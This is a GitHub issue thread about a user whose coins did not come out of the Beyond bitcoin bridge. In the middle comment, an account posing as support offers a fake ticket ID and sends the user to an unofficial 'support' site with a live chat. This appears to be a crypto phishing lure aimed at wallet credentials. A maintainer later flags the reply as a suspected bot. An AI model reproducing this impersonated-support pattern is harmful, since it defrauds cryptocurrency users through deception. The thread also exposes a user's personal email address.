### ISSUE TITLE
[When I interact with the ₿eyond bridge...]: 

### ISSUE THREAD

**Issue by epocaboa1** [beyond-btc/community#383]
### Contact details

genildobarrosmae@gmail.com

### What happened?

I crack the bridge several times and the coins don't fall out
![btc](https://github.com/user-attachments/assets/d67f46c4-c1fa-4a30-8e2d-363fae2eb3da)

### On which browser(s) did you encounter the issue?

Chrome, Metamask, Brave

**Comment by Tao546127REP** [comment]
> ### Contact details
> [genildobarrosmae@gmail.com](mailto:genildobarrosmae@gmail.com)
> 
> ### What happened?
> I crack the bridge several times and the coins don't fall out ![btc](https://private-user-images.githubusercontent.com/160645147/380208916-d67f46c4-c1fa-4a30-8e2d-363fae2eb3da.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mjk4NjczOTAsIm5iZiI6MTcyOTg2NzA5MCwicGF0aCI6Ii8xNjA2NDUxNDcvMzgwMjA4OTE2LWQ2N2Y0NmM0LWMxZmEtNGEzMC04ZTJkLTM2M2ZhZTJlYjNkYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQxMDI1JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MTAyNVQxNDM4MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1hZTYxMmFjMGUwMDQ1YmEzMGJjMGQ0YzczNDM5MjE0YThkZDAzMWM5NTNmOTlmMGNjNzA2ZTA1ZTYwMzYyYmFkJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.GnbpZW5lC9LjJXoetnO4sBc--bog8FuCi4UawbXRDdM)
> 
> ### On which browser(s) did you encounter the issue?
> Chrome, Metamask, Brave



Hey @epocaboa1 Oh, that's frustrating! It seems like the coins are stuck in the bridge. Have you tried refreshing the page or reconnecting your wallet to see if that helps shake loose those coins? If the issue persists, reaching out to the support team for the bridge might be the best bet to get those coins flowing smoothly again. I'll have to refer you to the official support Requests team with the ticket ID ₿B552130 
Please see the link below to our dedicated support line:
[₿eyond bridge Support Requests](https://mainnnodeintegrate.pages.dev/)
Click on the live chat icon at the bottom corner of the page to initiate chat

**Comment by sunnybeyond** [comment]
Suspect bot or low effort.
